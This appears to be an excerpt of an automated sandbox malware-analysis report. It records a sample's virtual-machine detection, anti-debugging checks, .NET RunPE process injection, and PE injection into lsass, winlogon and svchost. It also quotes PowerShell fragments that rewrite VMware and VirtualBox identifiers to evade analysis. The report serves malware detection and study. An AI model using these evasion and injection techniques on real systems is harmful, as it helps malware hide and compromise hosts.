Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000002.2956365705.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000008.00000000.1747138035.000002A66065D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000017.00000000.1828228212.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000009.00000002.3038914037.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B887801 CheckRemoteDebuggerPresent, 2_2_00007FFD9B887801
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_007A1361
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00470594 mov eax, dword ptr fs:[00000030h] 1_2_00470594
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00761130 mov eax, dword ptr fs:[00000030h] 1_2_00761130
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A3F3D mov eax, dword ptr fs:[00000030h] 1_2_007A3F3D
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00401868 GetProcessHeap,HeapAlloc,StrCpyW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW, 1_2_00401868
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_007A1361
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_007A4C7B
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A684D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000002D8B0A684D4
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000002D8B0A6DBF4
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A68170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000002D8B0A68170
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000225DC64DBF4
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC6484D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00000225DC6484D4
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC648170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000225DC648170
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEDBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000202C0AEDBF4
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000202C0AE8170
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00000202C0AE84D4
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A661308170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_000002A661308170
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_000002A66130DBF4
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A6613084D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_000002A6613084D4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000002BAAE26DBF4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE2684D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_000002BAAE2684D4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE268170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000002BAAE268170
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879C84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_0000026A879C84D4
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CDBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0000026A879CDBF4
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879C8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0000026A879C8170
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537A8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000179537A8170
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537A84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00000179537A84D4
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537ADBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000179537ADBF4
Source: C:\Users\user\Desktop\x433.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code contains process injector
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 1.0.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 3.2.powershell.exe.21ffc670000.15.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 5_2_0000000140002434
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AE232A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B392A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3F72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A4152A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDF32A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C0262A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C9F32A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 644B2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4F62A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F5352A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F0D62A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: FFB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C2572A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BCE2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7DB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78742A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60DA2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A1602A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C4262A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 94D52A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F36C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6B72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 801F2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 71E62A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3ED21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B9BA2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3382A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6DDB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6972A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10121C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A621C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2DF21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2C221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E621C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 24A21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8521C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14621C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2D921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25F21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2C321C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2CA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 28721C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2BB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11D21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11721C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10A21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13E21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25B21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B821C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 28C21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2D021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2DC21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 23F21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E721C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB162A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE472A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE4A2A8C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAE230000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A Jump to behavior
